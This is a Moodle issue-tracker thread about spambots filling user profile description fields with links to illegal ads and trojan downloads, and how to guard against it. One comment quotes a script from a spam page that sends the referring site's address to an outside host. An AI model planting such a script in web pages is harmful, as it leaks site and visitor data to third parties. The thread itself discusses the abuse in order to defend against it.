Moodle

The latest versions of moodle allow you to lock that field from Administration -> Users -> Authentication or change default authentication method. Is that version 1.5 correct?

Have you also seen the forceloginforprofiles setting in the admin menu?

Would it be a bad idea to totally remove description field from user profile or change it to a link to a field edited from user profile separately. http://tracker.moodle.org/browse/MDL-7407 ( captcha ) might work to prevent "automatic mass registration" but it does not prevent possible abuse of description field. During the last two weeks spammers have attacked about 1 million sites with link lists containing some moodle site(s) and some user profile(s) filled with nasty (mostly illegal) material and some of those links offer any type of worms, downloaders, backdoors, droppers or other types of trojans. Most of those attacked sites (found by searching "user/view.php" and some familiar spam words ) don't even seem to know that they may have 100 illegal ads

http://spamtrackers.eu/wiki/index.php?title=Main_Page gives more info about those tricks they have hidden behind links. Those spammers are not only sending mail - they are more likely searching such users who have not protected home PC's or servers against viruses and executable programs to be able to hijack usernames, passwords and finally servers for their needs...

On the other hand description field is very useful - but it could be uneditable by default with a warning for admins about possible abuse of this field if site is open for anybody (and an advice to consider stricter site politics...)
Most of those new user profile pages with ads and links to "nasty sites" are created by bots or fake persons. It is safe to view those user profile pages of your moodle site but clicking any of the links advertising travel,cigarettes,watches,viagra... may cause trouble. Different links seem to have different tasks. For example some links lead to a page that has a script like

<script>var r = document.referrer; document.write('<script src="http://www.stats-log.com/gb.php?id=g&r='escape(r)'"><' + '/script>')</script>

This tiny javascript takes your site address (document.referrer). It looks like a script that collects stats/logs but it can be used to create a new spam server where part of the new server name comes from your site (referrer page) or a new spam message containing your server. Server www.stats-log.com alone had over 5 million hits during the last 3 months and there is an endless chain of similar servers (Expiration Date for www.stats-log.com is 2008-01-12 but it has definetely many clones...). Most of the owners or contact persons found from whois info are unknown or fake.

We can't stop these guys ( http://www.spamhaus.org/statistics/spammers.lasso ) - they will continue searching new weak points from moodle too - but should something like http://spamlinks.net/prevent-users.htm be added to documentation (security)?

Not quite a duplicate, but very similar to MDL-17107.

Colin, thanks for your report, and Mauno, thanks for your comments.

Closing as duplicate. Please watch / vote for / comment on the more recent issue - MDL-17107.